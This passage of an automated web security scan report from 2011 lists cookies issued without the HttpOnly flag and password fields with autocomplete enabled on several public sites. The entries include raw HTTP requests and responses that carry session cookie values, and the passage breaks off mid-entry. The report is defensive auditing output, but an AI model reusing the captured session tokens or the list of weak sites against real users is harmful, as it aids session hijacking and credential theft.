GET /Travel/CheapFlights Host: www.intellicast.com Proxy-Connection: keep-alive Referer: http://www.intellicast Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
Response
HTTP/1.1 200 OK Cache-Control: max-age=86400 Content-Type: text/html Content-Location: http://www.intellicast Expires: Wed, 01 Jan 1997 12:00:00 GMT Last-Modified: Mon, 15 Feb 2010 17:02:20 GMT Accept-Ranges: bytes ETag: "0f681a260aeca1:d07" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:46:02 GMT nnCoection: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt Content-Length: 9446 ...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Intellicast ...[SNIP]... |
10.83. http://www.intellicast.com/favicon.ico previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.intellicast |
Path: | /favicon.ico |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- NSC_jdbtu_efgbvmu_iuuq_wt
=44113c293660;expires=Sun , 09-Jan-11 02:12:24 GMT;path=/
Request
GET /favicon.ico HTTP/1.1 Host: www.intellicast.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
Response
HTTP/1.1 200 OK Content-Length: 1150 Content-Type: image/x-icon Content-Location: http://www.intellicast Last-Modified: Mon, 15 Feb 2010 17:02:22 GMT Accept-Ranges: bytes ETag: "e4451aa460aeca1:d07" Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:46:15 GMT Cneonction: close Set-Cookie: NSC_jdbtu_efgbvmu_iuuq_wt ............ .h.......(....... ..... ......................... ...[SNIP]... |
10.84. http://www.peanutlabs.com/core.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /core.php |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- pl_email=test4%40fastdial
.net; expires=Tue, 08-Feb-2011 01:34:42 GMT; path=/; domain=.peanutlabs.com
Request
GET /core.php?coreClass=IdCmd Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: application/json, text/javascript, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:34:42 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_email=test4%40fastdial Vary: Accept-Encoding,User Content-Type: text/javascript Content-Length: 26985 {"uid":"12633542","user ...[SNIP]... |
10.85. http://www.peanutlabs.com/pl/profileSurveyRegister.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /pl/profileSurveyRegister |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- pl_user_id=8939b981e2
-5329197bbf0fb46f475 fdce27e545262; expires=Mon, 09-Jan-2012 01:34:41 GMT; path=/; domain=.peanutlabs.com - pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com
Request
GET /pl/profileSurveyRegister Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:34:41 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: pl_user_id=8939b981e2 Set-Cookie: pl_profile=deleted; expires=Sat, 09-Jan-2010 01:34:40 GMT; path=/; domain=.peanutlabs.com Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 2467 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... |
10.86. http://www.peanutlabs.com/publisher/dashboard2/PublisherDashboard.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.peanutlabs.com |
Path: | /publisher/dashboard2 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com
Request
GET /publisher/dashboard2 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www1.peanutlabs Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:35:39 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: ext_cid=deleted; expires=Sat, 09-Jan-2010 01:35:39 GMT; path=/; domain=.peanutlabs.com Vary: Accept-Encoding,User Content-Type: text/html Content-Length: 2293 <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Peanut Labs Media Publisher Dashboard</title> <script src="AC_OETags.js" language="javascript" ...[SNIP]... |
10.87. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExit&orig=CD99&s=MQExit&c=409 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/03745344/&subid1 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- mt_imp=54267db83a49b
89cd0644d669488302a; path=/
Request
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.yourpurec Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
10.88. http://www.pixeltrack66.com/mt/03745344/&subid1=MQExit&subid2=CD99&subid3=409&web_id=e99MQExitPop&orig=CD99&s=MQExit&c=409 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/03745344/&subid1 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- mt_imp=54267db83a49b
89cd0644d669488302a; path=/
Request
GET /mt/03745344/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:13:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.yourpurec Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
10.89. http://www.pixeltrack66.com/mt/x2a40344g4q2/&subid1=MQThankYou&subid2=CD99&subid3=409&subid4= previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pixeltrack66 |
Path: | /mt/x2a40344g4q2/&subid1 |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- mt_imp=54267db83a49b
89cd0644d669488302a; path=/
Request
GET /mt/x2a40344g4q2/&subid1 Host: www.pixeltrack66.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mt_clk=54267db83a49b |
Response
HTTP/1.1 302 Found Date: Sun, 09 Jan 2011 05:14:10 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa IVAi IVDi CONi HISi TELi OUR IND PHY ONL FIN COM NAV INT DEM GOV" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: mt_imp=54267db83a49b Location: http://www.socialtrack Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
10.90. http://www.pogo.com/action/pogo/lightreg.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /action/pogo/lightreg.do |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- com.pogo.lkey=TRB7pR
5Zmd6Ko2z1Cn4zUAAAKMQ.; Domain=.pogo.com; Path=/
Request
POST /action/pogo/lightreg.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Cache-Control: max-age=0 Origin: http://www.pogo.com Content-Type: application/x-www-form Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD Content-Length: 210 site=pogo&screenname ...[SNIP]... |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.site=pogo; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:11 GMT; Path=/login Set-Cookie: com.pogo.lkey=TRB7pR Set-Cookie: com.pogo.tafrcode=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login Location: http://www.pogo.com/login Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:26:10 GMT Server: Apache-Coyote/1.1 |
10.91. http://www.pogo.com/games/connect.jsp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /games/connect.jsp |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- com.pogo.recent=scrabble
.2player.social.17fbdp; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:34:04 GMT; Path=/games/
Request
GET /games/connect.jsp?game Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.nsc=age.:sort |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.recent=scrabble Location: http://game3.pogo.com Content-Length: 0 Date: Sun, 09 Jan 2011 01:34:03 GMT Server: Apache-Coyote/1.1 |
10.92. http://www.pogo.com/games/scrabble previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /games/scrabble |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- com.pogo.nsc=age.:sort
.favdown:va.false :scrabble.2player .beginner:; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:29:48 GMT; Path=/games/
Request
GET /games/scrabble Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: prod.JID=269399119AD |
Response
HTTP/1.1 200 OK Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.nsc=age.:sort Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 09 Jan 2011 01:29:47 GMT Server: Apache-Coyote/1.1 Content-Length: 59330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... |
10.93. http://www.pogo.com/login/entry.jsp previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/entry.jsp |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- com.pogo.lkey=TRB7pR
5lcxMFFwWzCn4zTAAAKME.; Domain=.pogo.com; Path=/
Request
GET /login/entry.jsp HTTP/1.1 Host: www.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_sess=%20s_cc%3Dtrue%3B |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.lkey=TRB7pR Location: http://www.pogo.com/ Content-Length: 0 Date: Sun, 09 Jan 2011 01:52:09 GMT Server: Apache-Coyote/1.1 |
10.94. http://www.pogo.com/login/pogo/setCookie.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.pogo.com |
Path: | /login/pogo/setCookie.do |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- com.pogo.info=1A06DD
6489046E8C5400B01BCD C200C5C740894EE1C1D5 4B9D6337ECAA3BC8AA9E 96C90EB8BD479A84B5EA E5F7FFE0276A4654905B 9B0F27BA3BCEA9A972CD 5BBA61610C9A8736A7BE 0F37B01924BD04B761D8 77642A78CFB4C56CAE92 4D0222579F2238A5B7AF DCAF21A40BDF3AD46495 DF9940B114E1282F07B7 5AC2B359A34804B80F29 00E0845400B01BCDC200 C5C740894EE1C1D54B9D 6337ECAA3BC8AA9E96C9 0EB8BD479A84B5EAE5F7 FFE0276A4654905B9B0F 27BA3BCEA9A972CD5BBA 61610C9A8736A7BE0F37 B01924BD04C8EBFDFE58 6AD587680A170C3EDC16 1B48B80C858E980A71; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 01:26:12 GMT; Path=/login
Request
GET /login/pogo/setCookie.do HTTP/1.1 Host: www.pogo.com Proxy-Connection: keep-alive Referer: http://www.pogo.com Cache-Control: max-age=0 Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.site=pogo; prod.JID=269399119AD |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Content-Language: en-US Set-Cookie: com.pogo.info=1A06DD Location: http://www.pogo.com Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:26:11 GMT Server: Apache-Coyote/1.1 |
10.95. https://www.pogo.com/fbconnect/js.do previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | https://www.pogo.com |
Path: | /fbconnect/js.do |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- prod.JID=C0E6107E929
4EBED951A4EC6E886F7B9 .000257; Domain=.pogo.com; Path=/
Request
GET /fbconnect/js.do HTTP/1.1 Host: www.pogo.com Connection: keep-alive Referer: https://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: com.pogo.unid=660648 |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=C0E6107E929 Content-Language: en-US Location: https://www.pogo.com Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 01:47:02 GMT Server: Apache-Coyote/1.1 |
10.96. http://www.rockband.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.rockband.com |
Path: | / |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- rb_s=3a49e7e697e2c5f
07de70a8b370be1bb; path=/
Request
GET / HTTP/1.1 Host: www.rockband.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache X-MyHeader: (null) X-Duration: D=677765 microseconds Content-Type: text/html; charset=utf-8 Expires: Sun, 09 Jan 2011 02:53:52 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 09 Jan 2011 02:53:52 GMT Content-Length: 19192 Connection: close Set-Cookie: rb_s=3a49e7e697e2c5f <!DOCTYPE html> <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-Type" content="text/html; charse ...[SNIP]... |
10.97. http://www.xanga.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.xanga.com |
Path: | / |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- fp-promo-count=1
:634325354543847909; expires=Sun, 06-Feb-2011 01:44:14 GMT; path=/
Request
GET / HTTP/1.1 Host: www.xanga.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: fp-promo-count=1 X-Powered-By: ASP.NET Date: Sun, 09 Jan 2011 01:44:13 GMT Connection: close Content-Length: 82140 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> < ...[SNIP]... |
11. Password field with autocomplete enabled previous next
There are 43 instances of this issue:
- http://activity.livefaceonweb.com/
- http://diythemes.com/thesis/
- http://mail.cmsinter.net/Login.aspx
- http://mail.cmsinter.net/Login.aspx
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://malsup.com/jquery/form/
- http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://online.wsj.com/article/SB100014240
52748704415104576066 830729058232.html - http://themeforest.net/user/freshface/portfolio
- http://wordpress.org/extend/plugins/wp
-pagenavi/ - http://www.43things.com/person/
- http://www.adbrite.com/mb/commerce/purchase
_form.php - http://www.adbrite.com/mb/commerce/purchase
_form.php - http://www.facebook.com/
- http://www.facebook.com/
- http://www.facebook.com/
- http://www.facebook.com/2008/fbml
- http://www.facebook.com/Pogo
- http://www.facebook.com/pages/Packet-Storm
-Security/116613458352817 - http://www.facebook.com/peanutlabs
- https://www.facebook.com/connect/uiserver.php
- https://www.facebook.com/login.php
- http://www.gamespot.com/
- http://www.mlive.com/
- http://www.onestat.com/
- http://www.pandora.com/login.vm
- http://www.pandora.com/people/
- http://www.peanutlabs.com/adminLogin.php
- http://www.pogo.com/
- http://www.pogo.com/account/verify-password
.do - http://www.pogo.com/action/pogo/lightregview
.do - https://www.pogo.com/action/pogo/signin.do
- http://www.rockband.com/
- http://www.weather.com/
- http://www.weather.com/weather/local/48617
- http://www.weather.com/weather/local/48858
- http://www.weather.com/weather/local/48879
- http://www.weather.com/weather/local/USMI0020
- http://www.xanga.com/
Issue background
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).11.1. http://activity.livefaceonweb.com/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://activity |
Path: | / |
Issue detail
The page contains a form with the following action URL:- http://activity
.livefaceonweb.com /default.aspx
- txtPass
Request
GET / HTTP/1.1 Host: activity.livefaceonweb Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Date: Sun, 09 Jan 2011 02:02:02 GMT Connection: close Content-Length: 2896 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> ::Live Fa ...[SNIP]... <body> <form name="frmLogin" method="post" action="default.aspx" id="frmLogin"> <div> ...[SNIP]... <td align="left"> <input name="txtPass" type="password" id="txtPass" class="controlTextL" style="width:150px;" /></td> ...[SNIP]... |
11.2. http://diythemes.com/thesis/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://diythemes.com |
Path: | /thesis/ |
Issue detail
The page contains a form with the following action URL:- http://diythemes.com
/amember/login.php
- amember_pass
Request
GET /thesis/ HTTP/1.1 Host: diythemes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.3 X-Powered-By: PHP/5.3.3 Set-Cookie: PHPSESSID=131fd88d10 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://diythemes.com Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17813 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head profile="http://g ...[SNIP]... </h4> <form id="login_form" class="control_box" action="http://diythemes <p> ...[SNIP]... <p><input class="text_input" type="password" name="amember_pass" value="Password" onfocus="if (this.value == 'Password') {this.value = '';}" onblur="if (this.value == '') {this.value = 'Password';}" /></p> ...[SNIP]... |
11.3. http://mail.cmsinter.net/Login.aspx previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://mail.cmsinter.net |
Path: | /Login.aspx |
Issue detail
The page contains a form with the following action URL:- http://mail.cmsinter.net
/Login.aspx
- txtPassword
Request
GET /Login.aspx HTTP/1.1 Host: mail.cmsinter.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=215573381 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8153 <!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN" > <html> <head> <title>Login</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" ...[SNIP]... <body onload="CheckForParent(); SetFocus()"> <form name="login" method="post" action="Login.aspx" id="login"> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> ...[SNIP]... <td style="HEIGHT: 21px"><input name="txtPassword" type="password" id="txtPassword" onkeypress="return stopEnter()" onfocus="ClearPassword()" tabIndex="4" maxlength="31" class="inputTextMedT ...[SNIP]... |
11.4. http://mail.cmsinter.net/Login.aspx previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://mail.cmsinter.net |
Path: | /Login.aspx |
Issue detail
The page contains a form with the following action URL:- http://mail.cmsinter.net
/Login.aspx?ReturnUrl= %2fDefault.aspx
- txtPassword
Request
GET /Login.aspx?ReturnUrl= Host: mail.cmsinter.net Proxy-Connection: keep-alive Referer: http://www.cmswebdev.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=215573381 |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:21:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: authCookie=; expires=Tue, 12-Oct-1999 04:00:00 GMT; path=/; HttpOnly Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 8179 <!DOCTYPE HTML PUBLIC "-//W3C//Dtd HTML 4.0 transitional//EN" > <html> <head> <title>Login</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" ...[SNIP]... <body onload="CheckForParent(); SetFocus()"> <form name="login" method="post" action="Login.aspx <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> ...[SNIP]... <td style="HEIGHT: 21px"><input name="txtPassword" type="password" id="txtPassword" onkeypress="return stopEnter()" onfocus="ClearPassword()" tabIndex="4" maxlength="31" class="inputTextMedT ...[SNIP]... |
11.5. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:51 GMT Server: mod_security2/2.5.7 X-Powered-By: PHP/5.2.9 Vary: Accept-Encoding,User MS-Author-Via: DAV Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 57977 <!DOCTYPE html> <html lang="en_US" class="ui-widget-content" <head> <title>jQuery Form Plugin</title> <link rel="stylesheet" href="http://ajax ...[SNIP]... </pre> <form id="myForm1" action="dummy.php" method="post"><div> ...[SNIP]... <td><input name="Password" type="password" /></td> ...[SNIP]... |
11.6. http://malsup.com/jquery/form/ previous next
Summary
Severity: | Low |
Confidence: | Certain |
Host: | http://malsup.com |
Path: | /jquery/form/ |
Issue detail
The page contains a form with the following action URL:- http://malsup.com/jquery
/form/dummy2.php
- Password
Request
GET /jquery/form/ HTTP/1.1 Host: malsup.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
